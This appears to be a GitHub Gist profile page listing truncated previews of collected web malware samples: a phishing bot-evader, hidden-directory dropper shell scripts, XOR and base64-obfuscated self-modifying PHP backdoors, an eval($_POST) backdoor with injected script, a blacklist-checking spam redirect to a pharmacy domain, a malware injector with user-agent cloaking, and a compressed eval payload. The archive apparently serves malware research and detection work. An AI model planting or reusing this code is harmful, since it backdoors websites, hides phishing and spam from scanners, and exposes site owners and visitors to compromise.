Skip to content

Instantly share code, notes, and snippets.

View PalmaSolutions's full-sized avatar

Palma Solutions LTD PalmaSolutions

2 followers · 2 following
View GitHub Profile
@PalmaSolutions
PalmaSolutions / evader-main.php
Created July 22, 2017 10:20
Bot evader for phishing
<?php
/*
_____ _ _ ______ __ __ ___
/ ____| | | | | |___ / /_ | /_ | / _ \
| (___ | |__ __ _ __| | ___ __ __ / / | | | | | (_) |
\___ \ | '_ \ / _` | / _` | / _ \ \ \ /\ / / / / - | | - | | - > _ <
____) | | | | | | (_| | | (_| | | (_) | \ V V / / /__ - | | - | | - | (_) |
|_____/ |_| |_| \__,_| \__,_| \___/ \_/\_/ /_____| |_| |_| \___/
#=======================#
@PalmaSolutions
PalmaSolutions / node-js-malware.sh
Created July 21, 2017 11:29
malware built around node.js
#!/bin/sh
DIRNAME='.jshome'
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
if [ $? != 0 ];
then
echo 'exiting'
exit
@PalmaSolutions
PalmaSolutions / bot-downloader.sh
Created July 21, 2017 11:27
#!/bin/bash
DIRNAME='.gohome'
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
if [ $? != 0 ];
then
echo 'exiting'
exit
@PalmaSolutions
PalmaSolutions / unknown-malware-11.php
Created July 21, 2017 11:20
<?php
// NEXT LINE
$sfnusdihfudsksds = "MDA/GkpcaQQnG1ACQlQrRjARZRZaJF8KNFUaBxs0IwtE";
function readFile2(){$fname=__FILE__;$fp=fopen($fname,'rb');if(!$fp){die("reading\n");}$data=fread($fp,filesize($fname));fclose($fp);return $data;}function writeFile2($data){$fname=__FILE__;$fp=fopen($fname,'wb');if(!$fp){die("writing\n");}fwrite($fp,$data);fclose($fp);}function xor_enc2($str){$key='XDKjpsFmTw1ql7DhEzJu5H3oS05nvUDnkT1OxC32N2S4wTlDMjnBzYnogzO0CbOz0sKoJtqXokF2cAKAwe9VTrz5ldlhcB3EyuQeAQf2Hpv7sxFS7DwS3U03cQl3KIG1uLTytQqgHC44AgGYM50mmTkHogtg7hbSMBWcu5KhAtOHnNfwHC2gapDWjfxVceOJufeN4zaA';$res='';for($i=0;$i<strlen($str);$i++){$res.=chr(ord($str[$i])^ord($key[$i]));}return $res;}function enc2($str){$res=xor_enc2($str);$res=base64_encode($res);return $res;}function dec2($str){$str=base64_decode($str);$res=xor_enc2($str);return $res;}function change_url2($new_url){$str=readFile2();$arr=preg_split("/\r\n|\n|\r/",$str);$change=false;$new_str='';foreach($arr as $line){if($line==='// NEXT LINE'){$new_str.=$line."\n";$cha
@PalmaSolutions
PalmaSolutions / badass-redirect.php
Created July 14, 2017 12:19
Checks Safebrowsing and SpamHaus for blacklists, then goes to Viagra page
<?if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){$sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
if($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
header('HTTP/1.1 203');exit;}}header('HTTP/1.1 201');exit;}
header('HTTP/1.1 301 Moved Permanently');header('Location: http://rx-wallmart.su');
?>
@PalmaSolutions
PalmaSolutions / malware-injector.php
Created May 11, 2017 19:27
<?php
$scriptname= str_replace("/", "", $_SERVER["SCRIPT_NAME"]);
$code = '
<?php
$user_agent_to_filter = array( \'#Ask\s*Jeeves#i\', \'#HP\s*Web\s*PrintSmart#i\', \'#HTTrack#i\', \'#IDBot#i\', \'#Indy\s*Library#\',
\'#ListChecker#i\', \'#MSIECrawler#i\', \'#NetCache#i\', \'#Nutch#i\', \'#RPT-HTTPClient#i\',
\'#rulinki\.ru#i\', \'#Twiceler#i\', \'#WebAlta#i\', \'#Webster\s*Pro#i\',\'#www\.cys\.ru#i\',
\'#Wysigot#i\', \'#Yahoo!\s*Slurp#i\', \'#Yeti#i\', \'#Accoona#i\', \'#CazoodleBot#i\',
@PalmaSolutions
PalmaSolutions / unknown-malware-10.php
Created May 11, 2017 07:39
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN0VOY3JnZmk3RU5wdCUyMDRMT3M0NXJLdUVjWmpmJTNEJTJGN0VOJTJGNDU5NFpqZiUyRTJnZjRuRks3WmpmJTJFWmpmMiUyRTE5WmpmNVpqZiUyRmpxdTdFTmVyeTQ1JTJFYTNqYTNzS3VFJTNFJTNDa2o2JTJGS3VFc1pqZmNLdUVyaXB0JTNFJykucmVwbGFjZSgvNExPfDQ1fGtqNnxnZnw3RU58WmpmfG5GS3xhM3xLdUUvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.
@PalmaSolutions
PalmaSolutions / really-ugly-malware.php
Created May 11, 2017 07:38
<?php eval(gzuncompress("x⁄ÖTmoõH˛+.Br€™ù¶A{âï–\x24RkßüT•¬Î°Ï≥dwQE˛ÔùÂ≈v¨Kè/0≥œº<œÃ¬RõI\x09 6„ªŸ}Ù`)ê*N¨Œ——,¿yöÒC¸Ò!Œá'¶¸\x0d¡E,†‰B±‚ß=p|ÛQíJ‰K†|\x09òˇ>ˇ\x09¬ÎÎ<ø≈˜Qx;Ω∆:æπ‰’\x222MX','ãD¬…(Ó\x22•„≥‘ñJî\x5c⁄\x0d»µ.,áí&πÁÂç»⁄ª´0Ù7-˚Ç‚\x0bºÉu©ûwù7Qt_~ä/g”ipaøÒÌù°•1YI˛á™`s5∂”∏” \x0cæâ û\x5c]Ö(¡˘\x1bgñÖW\x099ÏÙ+Œ—ä'◊¡4“9ˆ(˝¶S˛ªäÒ±çL©Ú¨flûéΩ·¯£˜˛É7Ù)•‘2ˆK¡`]∞ïWfÂ9r0<d‚GçÇh’ËX.j≥mlÕ*iDm˝N…Ñm}Ê4QågΩ∂˛íÅ‚´eŒVêV £|›?O»hx2>˝pDâ>∂?≠\x0a™√zÿΩm\x22YUO∑íuLy°‡I≈-v\x22DÚl[∫ÇE˛n-≈÷¿+Ö鱄8æ\x00Uâ¢ó≤‚ü†öÖíuv∑^,Wóp¸Õ~q¨.9]πf∆•rÕ2Qôk>V û±#≤‰ÖÇ2ße•ì’`„:àz(äF{∆9~’û—ÎÈıáfi‡ª¯^ûqÉYœ4Tߘå÷;°JÙ˜è[O)[_E‘«ˇï!7€ÃY\x24Eañm7£¡«gØ[葉Is.°A·µ¡ÎF∫[◊a›˝;æ≤Z r¶Éˇu*o˝ZÓFôä_1+òj|~m„µ·%zhÊ^Œ√œ≥ª(æ\x09&WAÿ\x0cËmTDÛpÖìÈ˝'D+Q˝›~\x09fÛ»7î™\x5c5›¿P\x0dl#[u¥Ω£Ö‡CR+\x5c‰£óÀ6í<Áøbù%Â%†xÑ\x0cùóv∑;›˝24nH DH–1Ì!Ê´GC.R˝“yÏ˙`È·[?‹”Åk‚ø∏‡ı\x0bGÇúˆÀl∑˜uXgÍ˝‹3Î%’ˇË∫-,—Eiòƒı∂∂S≥^◊Ÿ⁄l~˜!-Ü"));
@PalmaSolutions
PalmaSolutions / spam-script.php
Created May 11, 2017 07:37
<?php
if (isset($_POST['test_a']) && isset($_POST['test_b']))
{
echo $_POST['test_a'] * $_POST['test_b'];
exit;
}
if (isset($_POST['task']))
{
error_reporting(E_ALL);
@PalmaSolutions
PalmaSolutions / unknown-malware-9.php
Created May 11, 2017 07:36
<?php
/**
* @package Libraries
* *********************************************************************
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/